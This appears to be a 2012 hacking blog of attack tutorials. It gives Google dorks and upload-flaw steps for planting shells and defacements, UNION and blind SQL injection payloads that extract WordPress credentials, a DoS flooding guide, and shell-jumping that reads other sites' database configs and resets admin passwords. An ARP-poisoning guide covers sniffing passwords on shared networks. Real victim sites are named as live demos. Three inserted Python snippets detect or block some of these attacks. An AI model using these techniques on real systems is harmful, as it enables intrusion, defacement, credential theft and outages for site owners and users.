Monday, 27 August 2012

Hexjector: open-source, cross-platform PHP script to automate site pentesting for SQL injection vulnerabilities

Hexjector is an open-source, cross-platform PHP script to automate site pentesting for SQL injection vulnerabilities.

Features:
1. Check for SQL injection vulnerabilities
2. Pentest SQL injection vulnerabilities
3. Web application firewall detector
4. Scan for admin page
5. Manual dump function
6. Browser
7. SQL injection type detection
8. Search for vulnerable sites by using a Google dork
9. MD5 cracker

Download here

Geeklog Remote Deface Upload Vulnerability

The Geeklog remote deface upload vulnerability is similar to the WordPress FCKeditor upload vulnerability (read about the WordPress FCKeditor upload vulnerability); in Geeklog only the path has changed.


Let's start.
Open google.com and enter this dork:
inurl:"/geeklog/"
or
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html


Now go to the site: site.com/geeklog/
Now put the path /Geeklog/fckeditor/editor/filemanager/upload/test.html after .com, .net or whatever the site's domain is.
The URL will now be:
site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

Now select php under
Select the "File Uploader" to use:

Now upload your deface :)

Live Demo
http://www.sightline4bd.com/geeklog/
http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html
http://sightline4bd.com/geeklog/images/libraryHack.htm

EzFilemanager Deface Upload vulnerability


Google dork: inurl:ezfilemanager/ezfilemanager.php
(Modify this dork to get more results from Google =)



Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this URL: website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and put ?sa=1&type=file after the URL.
The URL will now be: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Now find the upload option and upload your file. You can upload .html, .pdf, .ppt, .txt, .doc, .rtf, .xml, .xsl, .dtd, .zip, .rar, .jpg and .png files.

Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt


Happy New Year to all readers!! Leave a comment if you enjoyed this post :D

Easy way of hacking Wordpress website

Hi, here I'll tell you how to hack a WordPress site the easy way. I will use an exploit to hack sites. I saw lots of messages that say "hey, help, can anyone tell me how to hack WordPress", and it's an easy way with an exploit.

First we search Google with this to find sites:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

See the result:

[Image: asdmr.png]

I'm going to test one of them, for example this one found in Google:


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2


We are going to add the exploit. This is the exploit:


/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


and the site looks like this:


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


http://img638.imageshack.us/img638/2927/asddy.png



Now you can see the user and pass :D ! Just crack the hash and it's done.
The admin panel is:
http://Site/wp-login.php

Crash Small Websites with rDos

Required tools:
Port Scanner (download it)
rDos (download it)


Step One: First we need to find the website's IP address. This is very easy... there are many methods to get a website's IP. Hope you know them... if you don't, then comment below.

OK, so say the URL is http://www.yoursite.com. Now that you have your URL, open up CMD; to do this press Start > Run > cmd. Once you have CMD open, type ping http://www.yoursite.com, press Enter, and you will get the IP of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s.)

EXAMPLE:




Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy to do too. OK, open up the port scanner you downloaded.
Once in the port scanner, type in your victim's IP that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT RANGE SCAN!). It will ask for confirmation; you have to use a capital Y or a capital N! Now enter 79 for the lowest port and 81 for the highest, hit Enter, then hit capital Y.
 


[X] = Closed
[X] Vulnerable = Open


Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open you're on your way to crashing!!

OK, open up the rDos that you downloaded.
Enter the IP that we got from step 1.
It will ask you for the port to attack; use port 80, which is why we scanned to make sure 80 was open! If it is closed it will not work.
Hit Enter.

* = Flooding
- = Crashed or didn't connect!


EXAMPLE:



The site won't go offline immediately!!
It starts with ***********
Be patient... after some time it will go like this: **********-----------

This means the site crashed.

Blind SQLi Tutorial









What is Blind SQLi?


Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information have been established.


Blind SQLi Tutorial 




Let's start…

Suppose that you want to hack this website with Blind SQLi:

http://site.com/index.php?id=5

When we open this, we see a page with some articles, pictures, etc.

Then we test it for a blind SQL injection attack:

http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's OK.
Now the real test:

http://www.site.com/index.php?id=5 and 1=2 <--- this is false
So if some text, picture or other content is missing from the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version
To get the version in a blind attack we use substring, i.e.
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4.
Replace 4 with 5, and if the query returns TRUE then the version is 5, i.e.
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
When select doesn't work we use subselect, i.e.
http://www.site.com/index.php?id=5 and (select 1)=1
If the page loads normally then subselects work. Then we are going to see if we have access to mysql.user, i.e.
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.

3) Check table and column names
This is the part where guessing is your best friend :) i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(With limit 0,1 our query here returns 1 row of data, because the subselect returns only 1 row; this is very important.)
Then if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one :)
Let's say that we have found that the table name is users; now what we need is the column name.
The same as with the table name, we start guessing. Like I said before, try the common names for columns, i.e.
http://www.site.com/index.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that the column name is password (if we get false then try common names or just guess).
Here we merge 1 with the column password, then substring returns the first character (,1,1).

4) Pull data from the database
We found the table users and the columns username and password, so we are going to pull characters from them.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
OK, this pulls the first character of the first user in the table users.
substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value, which is then compared using the greater-than symbol >.
So if the ASCII value is greater than 80, the page loads normally (TRUE).
We keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using an ASCII converter we know that char(99) is the letter 'c'.
Then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
FALSE!!!
We know that the second character is char(105) and that is 'i'. We have 'ci' so far.
So keep incrementing until you get to the end (when >0 returns false we know that we have reached the end).
There are some tools for Blind SQL Injection, I think sqlmap is the best, but I'm doing everything manually, because that makes you a better SQL INJECTOR :D
Hope you learned something from this tutorial.
Have FUN! :)

To be continued and updated…
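
The request sequence in this tutorial is distinctive in a web server access log: one client sends many near-identical requests to one parameter, and the response size flips between two values. The following detection sketch is an added example, not part of the original post; the function name, the log lines (documentation IP ranges) and the response sizes are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe shapes taken from the walkthrough above.
SIGNATURES = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*@@version", re.I),
    "subselect_probe": re.compile(r"\(\s*select\s+1\b[^)]*\)\s*=\s*1", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
}
# Trailing ">N" comparison used in the character-by-character search.
COMPARE_RE = re.compile(r"\)\s*>\s*(\d+)\s*$")
# Common/combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)'
)


def _line(client, target, size):
    """Build one constructed access-log line."""
    return (f'{client} - - [27/Aug/2012:10:00:00 +0000] '
            f'"GET {target} HTTP/1.1" 200 {size}')


_EXTRACT = ("/index.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,"
            "password)+from+users+limit+0,1),1,1))%3E")

# Constructed sample: one ordinary visitor, one client replaying the tutorial.
SAMPLE_LOG = [
    _line("198.51.100.20", "/index.php?id=5", 5120),
    _line("198.51.100.20", "/search.php?q=rock+and+roll", 2210),
    _line("203.0.113.7", "/index.php?id=5%20and%201=1", 5120),
    _line("203.0.113.7", "/index.php?id=5%20and%201=2", 1830),
    _line("203.0.113.7", "/index.php?id=5+and+substring(@@version,1,1)=5", 5120),
    _line("203.0.113.7",
          "/index.php?id=5+and+(select+1+from+mysql.user+limit+0,1)=1", 1830),
] + [_line("203.0.113.7", _EXTRACT + str(n), size)
     for n, size in [(80, 5120), (95, 5120), (98, 5120), (99, 1830)]]


def find_blind_sqli_probes(log_lines, min_requests=3):
    """Return one finding per (client, path) that sent repeated probe requests."""
    seen = defaultdict(lambda: {"signatures": set(), "requests": 0,
                                "compare_values": set(), "sizes": set()})
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target, _status, size = match.groups()
        path, _, query = target.partition("?")
        decoded = unquote_plus(query)  # %20 and + both become spaces
        matched = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
        if not matched:
            continue
        entry = seen[(client, path)]
        entry["signatures"] |= matched
        entry["requests"] += 1
        entry["sizes"].add(size)
        compare = COMPARE_RE.search(decoded)
        if compare and "char_extraction" in matched:
            entry["compare_values"].add(int(compare.group(1)))
    findings = []
    for (client, path), entry in sorted(seen.items()):
        if entry["requests"] < min_requests:
            continue
        findings.append({
            "client": client,
            "path": path,
            "requests": entry["requests"],
            "signatures": sorted(entry["signatures"]),
            # Several distinct ">N" values: a value is being narrowed down.
            "extraction_in_progress": len(entry["compare_values"]) >= 3,
            # More than one response size: the page answers TRUE and FALSE
            # differently, so the parameter is very likely injectable.
            "oracle_visible": len(entry["sizes"]) > 1,
        })
    return findings


if __name__ == "__main__":
    for finding in find_blind_sqli_probes(SAMPLE_LOG):
        print(finding)
```

A finding with `oracle_visible` set means the application itself needs fixing (bound parameters or an integer cast on `id`), not only that the client should be blocked.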

BSQL Hacker : automated SQL Injection Framework Tool


It's easy to use for beginners and provides a great amount of customisation and automation support for experienced users. It features a nice Metasploit-like exploit repository to share and update SQL injection exploits.

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.
BSQL Hacker is aimed at experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

New version is out, it's mostly bug fixes.




Key Features

  • Easy Mode
    • SQL Injection Wizard
    • Automated Attack Support (database dump)
      • ORACLE
      • MSSQL
      • MySQL (experimental)
  • General
    • Fast and Multithreaded
    • 4 Different SQL Injection Support
      • Blind SQL Injection
      • Time Based Blind SQL Injection
      • Deep Blind (based on advanced time delays) SQL Injection
      • Error Based SQL Injection
    • Can automate most of the new SQL Injection methods that rely on Blind SQL Injection
    • RegEx Signature support
    • Console and GUI Support
    • Load / Save Support
    • Token / Nonce / ViewState etc. Support
    • Session Sharing Support
    • Advanced Configuration Support
    • Automated Attack mode, Automatically extract all database schema and data mode
  • Update / Exploit Repository Features
    • Metasploit-like exploit repository support
    • Allows to save and share SQL Injection exploits
    • Supports auto-update
    • Custom GUI support for exploits (cookie input, URL input etc.)
  • GUI Features
    • Load and Save
    • Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be shown to the user in a GUI)
    • Visually view true and false responses as well as full HTML response, including time and stats
  • Connection Related
    • Proxy Support (Authenticated Proxy Support)
    • NTLM, Basic Auth Support, use default credentials of current user/application
    • SSL (also invalid certificates) Support
    • Custom Header Support
  • Injection Points (only one of them or combination)
    • Query String
    • Post
    • HTTP Headers
    • Cookies
  • Other
    • Post Injection data can be stored in a separated file
    • XML Output (not stable)
    • CSRF protection support (one-time session tokens, ASP.NET ViewState or similar can be used for separate login sessions, bypassing proxy pages etc.)

Another Easy Method of WordPress Blog Hacking (WordPress Easy Comment)


Recently I have posted some tutorials on "How to hack a WordPress website/blog"; you can check them here:
http://www.devilscafe.in/search/label/Wordpress%20Hacking?max-results=9
So this is a new tutorial on WordPress blog hacking. Let's start...
Open Google.com and enter this dork:
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.

[Image: untitled22.JPG]
The website URL will be like this: http://www.site.com/?fbconnect_action=myhome&userid=
Now replace
?fbconnect_action=myhome&userid=
with this:
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Now the URL will change from
www.site.com/?fbconnect_action=myhome&userid=
to this:
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the username and password.

[Image: untitled23.JPG]
The password is encrypted with WordPress MD5 (blowfish). You need to decode this. Download and run this software to decode this type of password.
Then find the administrator panel. Normally it should be at
www.victrimsite.com/wp-admin

or
www.victrimsite.com/wp-login.php

[Image: untitled26.JPG]

Last step: type the decrypted username and password and log in to the website :)

Ajax File Manager ~ Shell and Files Upload Vulnerability


Open the Google search engine and type this dork: inurl:/plugins/ajaxfilemanager/
For example I got:

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/

or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any other site...
Now put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in the URL.


For example:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now find the upload option and upload your shell/deface/file.


To view your file, find the /Uploaded/ directory on the website by using your brain :P


Example of an uploaded file: http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


If you need to log in to any ajaxfilemanager:


Default Password Ajax File Manager
Username:ajax
Password:123456

"Simple Upload 53" : Shell Upload Vulnerability


Google dork: "inurl:simple-upload-53.php"


Go to Google.com and enter the dork
"inurl:simple-upload-53.php"


Look at the search results and select any website.


The exploit URL will be like this:


http://www.site.com/simple-upload-53.php


Now upload your shell here as .php.jpg, .php.gif, etc.,
and you can upload your deface as an image type.


To view your uploaded file just go to http://www.site.com/files/yourfilehere


Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg


Funny thing: http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put your message here and it will show on the website :D
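
The `.php.jpg` trick above works when an upload script checks only the last extension and stores the file under the client's name in a web-served directory. The server-side check below is an added example, not code from Simple Upload or from the original post; the function names and the allow-list are assumptions chosen for illustration.

```python
import os
import secrets

# Allowed final extensions and the magic bytes such a file must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a web server may pass to an interpreter. Some handler
# configurations act on any dot-separated part of a name, not just the last.
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar",
    "asp", "aspx", "jsp", "cgi", "pl", "py", "sh", "htaccess",
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def stored_name_for(client_name, data):
    """Validate an upload and return the server-chosen name to store it under."""
    # Drop any directory part, whichever separator the client used.
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base or "\x00" in base:
        raise UploadRejected("empty or malformed file name")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("file name has no base name or no extension")
    extension = parts[-1]
    if extension not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{extension} is not allowed")
    # shell.php.jpg -> parts[1:-1] == ["php"]
    embedded = SCRIPT_EXTENSIONS.intersection(parts[1:-1])
    if embedded:
        raise UploadRejected(f"script extension inside name: {sorted(embedded)}")
    if not data.startswith(ALLOWED_TYPES[extension]):
        raise UploadRejected("content does not match the declared type")
    # The magic-byte check does not stop a valid image with script text
    # appended; the random name with a single allow-listed extension is what
    # keeps the stored file from being routed to an interpreter.
    return f"{secrets.token_hex(16)}.{extension}"


def is_accepted(client_name, data):
    """Convenience wrapper: True if the upload passes validation."""
    try:
        stored_name_for(client_name, data)
        return True
    except UploadRejected:
        return False
```

Store accepted files outside the document root, or in a directory where script handlers are switched off, so that a file which slips through is still served as static content.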

"Shell Jumping" Hacking wordpress websites Based on same server


"Shell Jumping" Hacking Other websites Based on same server using b374k Newbie3viLc063s shell


The Newbie3viLc063s shell is coded by newbie c0de d3vil; it's a suitable shell for "Localhost Jumping".
This shell is a new version of the most popular shell, b374k.
Download it here: http://pastebin.com/JDhBnfkH
(Copy the source from the pastebin raw data section, paste it in Notepad and save it under any name ending in .php, like shell.php or devilscafe.php.)


Step 1 - Download the shell =)
Click on Local Domain to view all websites based on the same server.
Check for readable.
Step 2 - Now choose any website from the Local host domain list and copy its Senarai User value, then go to home and paste it into view file/folder in place of the keyword in home/replacethiskeyword/public_html/
For example, if the current view file/folder value = home/abc/public_html
and your website's Senarai User value (username) is xyz, then the view file/folder value will be home/xyz/public_html/
Step 3 - After going to that folder, look for the MySQL config (wp-config.php in WordPress and configuration.php for Joomla). Now open the file and you'll get the database username and password here.
It will look like:
Username =

/** MySQL database username */
define('DB_USER', 'googlyma_wrdp1');

PASSWORD =

/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');

Step 4 - Now connect to the MySQL database with the username and password
and enter this SQL query:
UPDATE wp_users SET user_pass = md5('123456') WHERE user_login = 'admin';
Step 5 - Go to http://webste.com/wp-admin/ and log in with the username and password.

Images Via :Newbie3viLc063s
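
Step 3 above works only when one hosting account can read another account's wp-config.php or configuration.php. The audit below checks a shared host for that condition. It is an added example, not part of the original post; the function names and the `<home_root>/<account>/public_html` layout are assumptions.

```python
import os
import stat

# Config files named in the post: WordPress and Joomla.
CONFIG_NAMES = {"wp-config.php", "configuration.php"}


def _others_can_reach(directory, account_home):
    """True if every directory from account_home down to directory has o+x.

    Without the execute bit for "others" on each level, another account
    cannot open files below it even when it knows the exact path.
    """
    current = directory
    while True:
        if not os.stat(current).st_mode & stat.S_IXOTH:
            return False
        if current == account_home:
            return True
        current = os.path.dirname(current)


def audit_config_exposure(home_root):
    """List world-readable CMS config files under <home_root>/<account>/public_html.

    Run it as root or as the hosting panel user so that every account's
    tree can be listed.
    """
    home_root = os.path.realpath(home_root)
    findings = []
    for account in sorted(os.listdir(home_root)):
        account_home = os.path.join(home_root, account)
        docroot = os.path.join(account_home, "public_html")
        if not os.path.isdir(docroot):
            continue
        for dirpath, _dirnames, filenames in os.walk(docroot):
            for name in sorted(CONFIG_NAMES.intersection(filenames)):
                path = os.path.join(dirpath, name)
                mode = stat.S_IMODE(os.stat(path).st_mode)
                if not mode & stat.S_IROTH:
                    continue  # e.g. 0600 or 0640: other accounts cannot read it
                findings.append({
                    "account": account,
                    "path": path,
                    "mode": oct(mode),
                    # Readable and reachable is the case the post relies on.
                    "reachable": _others_can_reach(dirpath, account_home),
                })
    return findings


if __name__ == "__main__":
    for finding in audit_config_exposure("/home"):
        state = "EXPOSED" if finding["reachable"] else "readable, path blocked"
        print(f'{finding["mode"]} {finding["path"]} ({state})')
```

For every finding, tighten the file to 0600 or 0640 under the site's own user and rotate the database password it contains, since there is no way to tell from the mode alone whether it has already been read.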

"Portail Dokeos" deface and Shell Upload vulnerability


The Portail Dokeos vulnerability is a kind of FCKeditor remote file upload vulnerability.
With this vulnerability a hacker can upload a shell, deface page or any file to the website without the admin username and password.


Google dork: "Portail Dokeos 1.8.5"
Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Go to http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html, change asp to PHP as with FCKeditor, and upload your deface, shell or file. You can upload .html, .php, .jpg and .txt formats here.
To view your uploaded file go here: http://website/patch/main/upload/your file here


Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.blowupwebshow.com/staff/main/upload/backlinks.html
http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.rottapro.net/main/upload/backlinks.html


Other websites For practice




"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily



"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"




Open Google.com and type this dork:
intitle:"QuiXplorer 2.3 - the QuiX project"


You'll see a lot of sites; some big websites are vulnerable too, like the Harvard University website.
Select any website from the search results.
Vulnerability



http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager.
You can upload your files here.


Find the edit file, create file, etc. icons on the page and click on the last one; it's the upload option.







You can also upload directly by changing the URL: just put action=upload&order=name&srt=yes
after index.php?
Example:
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell example: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or
any other supported file.
Click on your file to view it.
Live demo:
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
I know some asshole will change the deface,
so here is a mirror of the defacement: http://attack-h.org/attack/?id=8452

"Encodable" ~ another File Upload Vulnerability

Google dork: "intext:File Upload by Encodable"

Let's start... xd
Open google.com and enter this dork: "intext:File Upload by Encodable"
The search comes back with 166,000 results, but some results are fake... they may be malware,
so pick real ones only. You will see the title "Upload a file" in the search results :)
Click only the sites which come with the "Upload a file" title.
After clicking the link you'll get an upload form.
You'll see some options in this form like name, description, email, etc.
Type anything in these boxes, but add an email address in the email box; don't use your own,
put one like billy@microsoft.com, admin@nasa.gov, etc. :P

Now choose your file and upload it :)

After clicking the upload button a pop-up will open... don't close it, it will close automatically
after uploading the file.

On some sites you'll get the link to your uploaded file after uploading.
If you did not find it, then try these URLs:
/upload/files/
or /upload/userfiles/

Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
Uploaded page : http://150.101.230.65:8008/upload/files/xd.html

Thursday, 17 May 2012

Cain and Abel tutorial

Who doesn't know the perfect pair in the hacking world? Yes, Cain & Abel: together they are used for hacking inside a network, with a fairly complete feature set. So here I want to give a Cain & Abel tutorial plus a preview.

Cain & Abel download link: http://www.oxid.it/cain.html

I don't need to teach the installation, right? I'll assume everyone can already do it… Oh, and this works within a single network, so if you go to an internet cafe, the usernames and passwords of people logging in to FS, FB and so on can be obtained. The same applies at a hotspot, like the one where I did this.
Just open Cain & Abel.
Click start / stop sniffer as in the picture:

After that click the + sign [blue] to scan MAC addresses, and the display will look like this:

In the MAC address scanner just click OK.
It will then load and you get many IP addresses in the one network, along with their MAC addresses:

Once it has worked up to here you can go straight on to the next part.
Click APR in the tabs at the bottom, and the display will look like this:

After that click the + sign [blue] to add the IP addresses you want to poison. The display will look like this:

On the left side choose the router's IP [how do we know the router's IP?... does that need explaining too?]
Go to cmd and type ipconfig /all and you'll get all the information. Then work out for yourself which one is the router.
The right side holds the IP addresses you want to poison. If you want everything on the network, just select them all.
After that click OK.
After that step the display looks like this:

The status is idle, right? That means it has not been poisoned yet. Click start / stop ARP and the status will change to poisoning:

The list appearing below shows that there is a process being carried out.
Go straight to the passwords by clicking the password tab at the bottom:

Then click HTTP on the left, and look at the result:

Done.
I deliberately left one uncovered there; try whether it can still be used to log in or not.

Tuesday, 15 May 2012

Virtual LAN Lab II

Now we run the Windows XP that has been installed in VirtualBox.
Go to Control Panel – Network Connections and a window like the picture below will appear:

Right-click the Ethernet connection and choose Properties; a window like the following will appear:

Select Internet Protocol (TCP/IP) and click the Properties button. A window for entering the IP address and subnet mask will appear; enter the IP 192.168.0.2 and subnet mask 255.255.255.0. For more detail see the picture below:

Next we change the Workgroup and Computer Name on Windows XP: go to Control Panel – System and a window like the following will appear:

Change the Computer Description to whatever you like; leaving it empty is fine too. Then, to change the Computer Name and Workgroup, click the Change button and a window like the following picture will appear:

Change the Computer Name to whatever you like, but make sure the name is different from the one we set on Windows 7. Next change the Workgroup name; the Workgroup name must be the same as the one we created on Windows 7. Then click OK.
The settings are done. Now we will try to ping from the guest, Windows XP, to the host or server, Windows 7.
Open Command Prompt by pressing Windows + R and typing cmd. Or you can find it through Start – All Programs – Accessories – Command Prompt. The Command Prompt will appear as follows:
Then type ping 192.168.0.1 in the Command Prompt, because we are going to check whether Windows XP is connected to Windows 7. If it succeeds the result will look like the picture below:

OK, we have successfully created a LAN (Local Area Network) virtually. So anyone who wants to learn to build a client-server application does not need to go to the trouble of buying a new computer; with the method above we have a virtual computer that can be used as the client of the client-server application being built.